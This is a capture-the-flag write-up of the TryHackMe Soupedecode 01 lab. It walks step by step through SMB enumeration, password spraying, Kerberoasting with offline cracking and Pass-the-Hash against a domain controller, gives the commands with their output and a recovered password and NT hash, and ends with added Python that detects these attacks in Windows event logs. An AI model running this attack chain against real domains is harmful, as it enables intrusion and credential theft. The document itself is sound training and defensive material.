Challenges: Soupedecode 01 (TryHackMe)

Table of contents
- Soupedecode 01
- Key Services Identified
- Domain Details from LDAP
- Next Steps: What You Can Do
- 1. SMB Enumeration (smbclient, enum4linux, smbmap)
- 2. Kerberos Pre-auth / AS-REP Roasting Check
- 3. LDAP Enumeration (if anonymous bind allowed)
- 4. WinRM (5985)
- 5. DNS Zone Transfer (unlikely, but worth a shot)
- Recommended First Actions
- SMB Shares Available
- Answer the questions below

The Soupedecode 01 challenge provides a realistic Windows Active Directory penetration testing scenario where enumeration, persistence, and exploitation all come into play. Players are dropped into an enterprise-like environment with a Domain Controller exposed to common services such as Kerberos, LDAP, SMB, and WinRM. Through systematic reconnaissance, enumeration of shares and users, and the abuse of weak credentials, attackers progress from low-level access to domain compromise. This lab emphasizes the importance of enumeration, password policy weaknesses, and lateral movement techniques like Pass-the-Hash.
Soupedecode 01
Soupedecode is an intense and engaging challenge in which players must compromise a domain controller by exploiting Kerberos authentication, navigating through SMB shares, performing password spraying, and utilizing Pass-the-Hash techniques. Prepare to test your skills and strategies in this multifaceted cyber security adventure.
Note: Please allow 4 minutes for the VM to properly boot up.

```bash
nmap -p- -sV IP_Address
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2025-08-07 11:20 BST
Nmap scan report for ip-10-10-96-128.eu-west-1.compute.internal (10.10.96.128)
Host is up (0.00036s latency).
Not shown: 65516 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-07 10:22:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49718/tcp open msrpc Microsoft Windows RPC
49792/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/7%Time=68947E7D%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
MAC Address: 02:C3:66:4F:8F:DF (Unknown)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.56 seconds
```

You're looking at a Windows Active Directory environment based on your Nmap scan.
Here's a breakdown of what you've got, and how you can proceed with enumeration or exploitation:
Key Services Identified

| Port | Service | Description |
| --- | --- | --- |
| 88 | Kerberos | AD authentication |
| 135, 139, 445 | RPC, NetBIOS, SMB | File sharing & remote procedure calls |
| 389, 636 | LDAP, LDAPS | User and directory info |
| 3268, 3269 | Global Catalog LDAP | Often used in domain enumeration |
| 5985 | WinRM (HTTP) | Remote PowerShell (if creds are available) |
| 3389 | RDP | Remote Desktop (GUI access) |
| 53 | DNS | Likely hosting internal DNS for the AD domain |
| 593, 49664+, 49792 | RPC high ports | Common in domain controllers |
| 9389 | Active Directory Web Services | Used by PowerShell Remoting/WinRM/ADWeb |

Domain Details from LDAP
From ports 389/3268:
- Domain: SOUPEDECODE.LOCAL0. This looks possibly malformed, maybe a typo or obfuscation; the netexec output later in this write-up reports the domain as SOUPEDECODE.LOCAL.
- Host/Hostname: DC01

Next Steps: What You Can Do
Depending on what you're allowed or trying to test, here are common enumeration paths:
1. SMB Enumeration (smbclient, enum4linux, smbmap)

```bash
smbclient -L //10.10.96.128/ -N
enum4linux -a 10.10.96.128
smbmap -H 10.10.96.128
```

Look for:
- Guest access
- Readable shares (e.g. NETLOGON, SYSVOL)
- Users/groups enumeration
2. Kerberos Pre-auth / AS-REP Roasting Check
If usernames are discovered (via LDAP or SMB), check for Kerberos pre-auth disabled:

```bash
GetNPUsers.py -dc-ip 10.10.96.128 SOUPEDECODE.LOCAL/ -no-pass -usersfile users.txt
```

This helps find AS-REP roastable accounts for offline hash cracking.
3. LDAP Enumeration (if anonymous bind allowed)

```bash
ldapsearch -x -H ldap://10.10.96.128 -s base
```

Or using tools like ldapdomaindump, windapsearch, BloodHound (via SharpHound):

```bash
python3 ldapdomaindump.py 10.10.96.128
```

4. WinRM (5985)
If you obtain valid credentials, test WinRM:

```bash
evil-winrm -i 10.10.96.128 -u <user> -p <pass>
```

5. DNS Zone Transfer (unlikely, but worth a shot)

```bash
dig axfr @10.10.96.128 soupedecode.local
```

Recommended First Actions
Start with SMB and LDAP to extract usernames:

```bash
# SMB enum
enum4linux -a 10.10.96.128
# Try guest access
smbclient //10.10.96.128/IPC$ -N
```

Once you get a few usernames, try Kerberos or brute-force login against WinRM, SMB, or LDAP.

```bash
smbclient -L //10.10.96.128/ -N
```

SMB Shares Available
From your smbclient output:

| Share | Access Type | Notes |
| --- | --- | --- |
| ADMIN$ | Admin Only | Default remote admin share |
| C$ | Admin Only | Default share of C:\ drive |
| IPC$ | Named pipes | Use this to query further |
| NETLOGON | Readable! | Often readable by all users |
| SYSVOL | Readable! | Contains GPOs, login scripts |
| Users | May contain user folders | |
| backup | Custom! | May contain sensitive files |

Focus: NETLOGON, SYSVOL, and backup, especially backup, which may contain plaintext creds, scripts, or sensitive files.
Answer the questions below
What is the user flag?

```bash
enum4linux -a 10.10.96.128
netexec smb 10.10.63.125 --users
```

```
SMB 10.10.63.125 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
```

```bash
echo -e "administrator\nkrbtgt\nsvc_backup\njohn\nalice" > users.txt
netexec smb 10.10.63.125 -u 'Guest' -p '' --shares
```

```
SMB 10.10.63.125 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\Guest:
SMB 10.10.63.125 445 DC01 [*] Enumerated shares
SMB 10.10.63.125 445 DC01 Share Permissions Remark
SMB 10.10.63.125 445 DC01 ----- ----------- ------
SMB 10.10.63.125 445 DC01 ADMIN$ Remote Admin
SMB 10.10.63.125 445 DC01 backup
SMB 10.10.63.125 445 DC01 C$ Default share
SMB 10.10.63.125 445 DC01 IPC$ READ Remote IPC
SMB 10.10.63.125 445 DC01 NETLOGON Logon server share
SMB 10.10.63.125 445 DC01 SYSVOL Logon server share
SMB 10.10.63.125 445 DC01 Users
```

```bash
netexec smb 10.10.63.125 -u users.txt -p users.txt --no-bruteforce | grep -v FAILURE
```

```
SMB 10.10.63.125 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\svc_backup:svc_backup (Guest)
```

```bash
smbclient //10.10.63.125/Users -U 'soupedecode.local\ybob317'
```

```
Password for [SOUPEDECODE.LOCAL\ybob317]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Thu Jul 4 23:48:22 2024
.. DHS 0 Wed Jun 18 23:14:47 2025
admin D 0 Thu Jul 4 23:49:01 2024
Administrator D 0 Thu Aug 7 13:52:45 2025
All Users DHSrn 0 Sat May 8 09:26:16 2021
Default DHR 0 Sun Jun 16 03:51:08 2024
Default User DHSrn 0 Sat May 8 09:26:16 2021
desktop.ini AHS 174 Sat May 8 09:14:03 2021
Public DR 0 Sat Jun 15 18:54:32 2024
ybob317 D 0 Mon Jun 17 18:24:32 2024
12942591 blocks of size 4096. 10602947 blocks available
smb: \>
```


```
root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u users.txt -p 'Password123!'
SMB 10.10.63.125 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\users.txt:Password123! (Guest)
root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u users.txt -p passwords.txt
SMB 10.10.63.125 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\users.txt:passwords.txt (Guest)
root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u administrator -p 'admin'
SMB 10.10.63.125 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.63.125 445 DC01 [-] SOUPEDECODE.LOCAL\administrator:admin STATUS_LOGON_FAILURE
root@ip-10-10-171-65:~# smbclient //10.10.63.125/SYSVOL -U 'DOMAIN\user'
Password for [user]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> quit
root@ip-10-10-171-65:~# GetNPUsers.py SOUPEDECODE.LOCAL/ -usersfile users.txt -no-pass
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] [Errno 2] No such file or directory: 'users.txt'
root@ip-10-10-171-65:~# GetNPUsers.py SOUPEDECODE.LOCAL/ -usersfile user.txt -no-pass
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] [Errno 2] No such file or directory: 'user.txt'
root@ip-10-10-171-65:~# echo -e "administrator\nkrbtgt\nsvc_backup\njohn\nalice" > users.txt
root@ip-10-10-171-65:~# echo -e "Password123!\nWelcome1\nSummer2024\nadmin\nS0up3Decode!" > passwords.txt
bash: !\nWelcome1\nSummer2024\nadmin\nS0up3Decode!: event not found
root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u users.txt -p passwords.txt
SMB 10.10.63.125 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.63.125 445 DC01 [-] SOUPEDECODE.LOCAL\administrator:passwords.txt STATUS_LOGON_FAILURE
SMB 10.10.63.125 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:passwords.txt STATUS_LOGON_FAILURE
SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\svc_backup:passwords.txt (Guest)
root@ip-10-10-171-65:~# netexec smb $(IP) -u 'Guest' -p '' --shares
IP: command not found
netexec smb: error: the following arguments are required: target
root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u 'Guest' -p '' --list backup
netexec: error: unrecognized arguments: backup
```

```
smb: \> cd ybob317
smb: \ybob317\> ls
. D 0 Mon Jun 17 18:24:32 2024
.. DR 0 Thu Jul 4 23:48:22 2024
3D Objects DR 0 Mon Jun 17 18:24:32 2024
AppData DH 0 Mon Jun 17 18:24:30 2024
Application Data DHSrn 0 Mon Jun 17 18:24:30 2024
Contacts DR 0 Mon Jun 17 18:24:32 2024
Cookies DHSrn 0 Mon Jun 17 18:24:30 2024
Desktop DR 0 Fri Jul 25 18:51:44 2025
Documents DR 0 Mon Jun 17 18:24:32 2024
Downloads DR 0 Mon Jun 17 18:24:32 2024
Favorites DR 0 Mon Jun 17 18:24:32 2024
Links DR 0 Mon Jun 17 18:24:32 2024
Local Settings DHSrn 0 Mon Jun 17 18:24:30 2024
Music DR 0 Mon Jun 17 18:24:32 2024
My Documents DHSrn 0 Mon Jun 17 18:24:30 2024
NetHood DHSrn 0 Mon Jun 17 18:24:30 2024
NTUSER.DAT AHn 262144 Thu Aug 7 14:13:12 2025
ntuser.dat.LOG1 AHS 81920 Mon Jun 17 18:24:29 2024
ntuser.dat.LOG2 AHS 0 Mon Jun 17 18:24:29 2024
NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TM.blf AHS 65536 Mon Jun 17 18:24:54 2024
NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Jun 17 18:24:29 2024
NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Jun 17 18:24:29 2024
ntuser.ini AHS 20 Mon Jun 17 18:24:30 2024
Pictures DR 0 Mon Jun 17 18:24:32 2024
Recent DHSrn 0 Mon Jun 17 18:24:30 2024
Saved Games DR 0 Mon Jun 17 18:24:32 2024
Searches DR 0 Mon Jun 17 18:24:32 2024
SendTo DHSrn 0 Mon Jun 17 18:24:30 2024
Start Menu DHSrn 0 Mon Jun 17 18:24:30 2024
Templates DHSrn 0 Mon Jun 17 18:24:30 2024
Videos DR 0 Mon Jun 17 18:24:32 2024
smb: \ybob317\>
```


```
smb: \ybob317\> cd Desktop
smb: \ybob317\Desktop\> ls
. DR 0 Fri Jul 25 18:51:44 2025
.. D 0 Mon Jun 17 18:24:32 2024
desktop.ini AHS 282 Mon Jun 17 18:24:32 2024
user.txt A 33 Fri Jul 25 18:51:44 2025
smb: \ybob317\Desktop\> cat user.txt
cat: command not found
smb: \ybob317\Desktop\> get user.txt
getting file \ybob317\Desktop\user.txt of size 33 as user.txt (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
smb: \ybob317\Desktop\> quit
```

What is the root flag?

```bash
impacket-GetUserSPNs soupedecode.local/ybob317:ybob317 -dc-ip 10.10.63.125 -request
```

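
```bash
# Map the DC's names to its IP so the domain name resolves locally
nano /etc/hosts
```

```
10.10.63.125 soupedecode.local DC01 soupedecode
```

```bash
# Kerberos rejects requests when the client clock is too far from the DC's, so sync time first
apt install sntp
sudo sntp -sS soupedecode.local
```

```
sntp 4.2.8p12@1.3728-o (1)
2025-08-07 15:04:56.887926 (+0000) -0.809341 +/- 10.596628 soupedecode.local 10.10.63.125 s1 no-leap
```

```bash
# Request service tickets for accounts with an SPN and crack them offline
GetUserSPNs.py soupedecode.local/ybob317:ybob317 -dc-ip 10.10.63.125 -request -outputfile tickets.txt
john --wordlist=/usr/share/wordlists/rockyou.txt tickets.txt
```

```
Password123!!
```

```bash
john --show tickets.txt
cat tickets.txt
# Validate the recovered service-account password, then open the backup share
netexec smb 10.10.63.125 -u file_svc -p 'Password123!!' -d soupedecode.local
smbclient //10.10.63.125/backup -U 'soupedecode.local\file_svc'
```
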
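
```bash
# $IP is a shell variable holding the target address; $(IP) would try to run a command named IP
netexec smb "$IP" -u 'file_svc' -p '***********' --shares
netexec smb 10.10.176.0 -u 'file_svc' -p 'Password123!!' --shares
# hashes.txt: the account:RID:LM:NT lines pulled from the backup share
nano hashes.txt
# Field 1 is the account name, field 4 the NT hash
cat hashes.txt | cut -d ':' -f 1 > users.txt
cat hashes.txt | cut -d ':' -f 1 > backup_extract_users.txt
cat hashes.txt | cut -d ':' -f 4 > backup_extract_hashes.txt
# --no-bruteforce pairs line N of the user file with line N of the hash file
nxc smb dc01.soupedecode.local -u backup_extract_users.txt -H backup_extract_hashes.txt --no-bruteforce --continue-on-success
netexec smb 10.10.63.125 -u backup_extract_users.txt -H backup_extract_hashes.txt -d soupedecode.local
```
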
Finding the flag wasn't straightforward, but I ended up using this command and looked within the files to get the root flag in the Desktop folder: C:\Users\Administrator\Desktop\root.txt

```bash
smbclient //10.10.72.65/C$ -U 'SOUPEDECODE.LOCAL\FileServer$' --pw-nt-hash e41da7e79a4c76dbd9cf79d1cb325559
```

In completing Soupedecode 01, we demonstrated how an attacker can pivot from unauthenticated enumeration to domain dominance by leveraging SMB shares, Kerberos authentication, and weak service accounts. The challenge reinforces a crucial lesson: Active Directory environments are only as strong as their weakest credential or misconfigured service. By practicing these steps in a controlled lab, defenders gain insight into how attackers operate, while red teamers sharpen their tradecraft. Ultimately, this exercise highlights why enforcing strong authentication policies, securing SMB/LDAP services, and monitoring account activity are vital in defending enterprise networks.
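
The three credential abuses chained in this walkthrough (password spraying, Kerberoasting a service account, and Pass-the-Hash with a machine account) each leave a pattern in the domain controller's Security log. The following is an added example, not part of the original write-up: detection logic over constructed records that use Windows event IDs 4625, 4769 and 4624. The thresholds, the `INVENTORY` asset map, the `ev` helper and all sample values are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # Kerberos etype 23 (RC4-HMAC)


def ev(clock, event_id, user, ip, **extra):
    """Build one constructed record using Windows Security event field names."""
    return {"time": datetime.fromisoformat(f"2025-08-07T{clock}"), "EventID": event_id,
            "TargetUserName": user, "IpAddress": ip, **extra}


# Constructed sample data (not captured from the lab). 192.0.2.10 stands in for
# the testing host; INVENTORY is a hypothetical map of machine accounts to hosts.
INVENTORY = {"fileserver$": "10.0.0.20"}
EVENTS = [
    # 4625 failed logons: one source walking a user list
    ev("14:00:01", 4625, "administrator", "192.0.2.10"),
    ev("14:00:02", 4625, "krbtgt", "192.0.2.10"),
    ev("14:00:03", 4625, "svc_backup", "192.0.2.10"),
    ev("14:00:04", 4625, "john", "192.0.2.10"),
    ev("14:00:05", 4625, "alice", "192.0.2.10"),
    # Benign: one user mistyping a password twice
    ev("14:01:00", 4625, "jsmith", "10.0.0.31"),
    ev("14:01:20", 4625, "jsmith", "10.0.0.31"),
    # 4769 service-ticket requests
    ev("15:05:10", 4769, "ybob317@SOUPEDECODE.LOCAL", "192.0.2.10",
       ServiceName="file_svc", TicketEncryptionType="0x17"),
    ev("15:06:00", 4769, "jsmith@SOUPEDECODE.LOCAL", "10.0.0.31",
       ServiceName="DC01$", TicketEncryptionType="0x12"),
    # 4624 successful network logons by a machine account
    ev("15:40:00", 4624, "FileServer$", "10.0.0.20",
       LogonType=3, AuthenticationPackageName="Kerberos"),
    ev("15:45:00", 4624, "FileServer$", "192.0.2.10",
       LogonType=3, AuthenticationPackageName="NTLM"),
]


def detect_spray(events, min_accounts=4, window=timedelta(minutes=5)):
    """Flag a source that fails logons for many distinct accounts inside one window."""
    by_src = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            by_src[e["IpAddress"]].append(e)
    alerts = []
    for src, fails in by_src.items():
        fails.sort(key=lambda f: f["time"])
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until it spans at most `window`
            while fails[end]["time"] - fails[start]["time"] > window:
                start += 1
            in_window = {f["TargetUserName"].lower() for f in fails[start:end + 1]}
            if len(in_window) >= min_accounts:
                everyone = sorted({f["TargetUserName"].lower() for f in fails})
                alerts.append((src, everyone))
                break
    return alerts


def detect_rc4_service_tickets(events):
    """Flag RC4 service tickets issued for user-account SPNs (a Kerberoasting heuristic)."""
    alerts = []
    for e in events:
        if e["EventID"] != 4769:
            continue
        service = e["ServiceName"]
        if service.endswith("$") or service.lower() == "krbtgt":
            continue  # machine accounts and the TGS itself have random, long keys
        if int(e["TicketEncryptionType"], 16) == RC4_HMAC:
            alerts.append((e["TargetUserName"], service, e["IpAddress"]))
    return alerts


def detect_machine_ntlm(events, inventory):
    """Flag NTLM network logons by a machine account from a host other than its own."""
    alerts = []
    for e in events:
        if e["EventID"] != 4624 or e.get("LogonType") != 3:
            continue
        if e.get("AuthenticationPackageName") != "NTLM":
            continue
        user = e["TargetUserName"]
        if user.endswith("$") and inventory.get(user.lower()) != e["IpAddress"]:
            alerts.append((user, e["IpAddress"]))
    return alerts


if __name__ == "__main__":
    print("spray:", detect_spray(EVENTS))
    print("rc4 service tickets:", detect_rc4_service_tickets(EVENTS))
    print("machine-account NTLM:", detect_machine_ntlm(EVENTS, INVENTORY))
```

The RC4 check only separates signal from noise where AES is the normal ticket encryption type, and the inventory comparison needs a maintained mapping of machine accounts to addresses.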
Written by Jebitok